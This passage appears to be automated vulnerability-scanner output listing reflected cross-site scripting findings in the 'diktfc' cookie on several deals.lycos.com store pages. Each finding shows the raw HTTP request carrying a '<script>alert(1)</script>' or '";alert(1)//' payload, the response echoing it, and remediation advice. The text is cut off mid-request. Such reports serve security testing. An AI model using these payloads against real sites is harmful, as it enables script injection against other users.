Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/dell-home-638 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/dell-home-638&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b&amp;cj=1" alt="tracker" />
...[SNIP]...

1.312. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"%3balert(1)//d150acaf4db was submitted in the diktfc cookie. This input was echoed as efe09";alert(1)//d150acaf4db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/dell-home-638 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aefe09"%3balert(1)//d150acaf4db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/dell-home-638",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aefe09";alert(1)//d150acaf4db"
});
</script>
...[SNIP]...

1.313. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a88"><script>alert(1)</script>0fb01bfaa85 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/ebay-50 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/ebay-50&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85&amp;cj=1" alt="tracker" />
...[SNIP]...

1.314. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 317e4"%3balert(1)//c8dbb3e8531 was submitted in the diktfc cookie. This input was echoed as 317e4";alert(1)//c8dbb3e8531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/ebay-50 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A317e4"%3balert(1)//c8dbb3e8531; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/ebay-50",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A317e4";alert(1)//c8dbb3e8531"
});
</script>
...[SNIP]...

1.315. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0001"%3balert(1)//e061132f52f was submitted in the diktfc cookie. This input was echoed as a0001";alert(1)//e061132f52f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/itunes-music-store-1414 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0001"%3balert(1)//e061132f52f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/itunes-music-store-1414",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0001";alert(1)//e061132f52f"
});
</script>
...[SNIP]...

1.316. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef1"><script>alert(1)</script>ba52086b4b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/itunes-music-store-1414 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/itunes-music-store-1414&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8&amp;cj=1" alt="tracker" />
...[SNIP]...

1.317. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/jcpenney-320

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f34a"><script>alert(1)</script>05c0ac4a695 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/jcpenney-320 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/jcpenney-320&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695&amp;cj=1" alt="tracker" />
...[SNIP]...

1.318. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/jcpenney-320

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfcf4"%3balert(1)//5e595d1d45 was submitted in the diktfc cookie. This input was echoed as cfcf4";alert(1)//5e595d1d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/jcpenney-320 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Acfcf4"%3balert(1)//5e595d1d45; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/jcpenney-320",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Acfcf4";alert(1)//5e595d1d45"
});
</script>
...[SNIP]...

1.319. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/kohls-1009

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eb51"%3balert(1)//dcef7041eb3 was submitted in the diktfc cookie. This input was echoed as 7eb51";alert(1)//dcef7041eb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/kohls-1009 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7eb51"%3balert(1)//dcef7041eb3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/kohls-1009",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7eb51";alert(1)//dcef7041eb3"
});
</script>
...[SNIP]...

1.320. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/kohls-1009

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d946"><script>alert(1)</script>30c7b4c6229 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/kohls-1009 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/kohls-1009&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229&amp;cj=1" alt="tracker" />
...[SNIP]...

1.321. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/sony-style-716

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c81"%3balert(1)//0b0bfcb7a69 was submitted in the diktfc cookie. This input was echoed as 34c81";alert(1)//0b0bfcb7a69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/sony-style-716 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34c81"%3balert(1)//0b0bfcb7a69; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
cript type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/sony-style-716",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34c81";alert(1)//0b0bfcb7a69"
});
</script>
...[SNIP]...

1.322. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/sony-style-716

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d333"><script>alert(1)</script>bb3b7fe1ad4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/sony-style-716 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
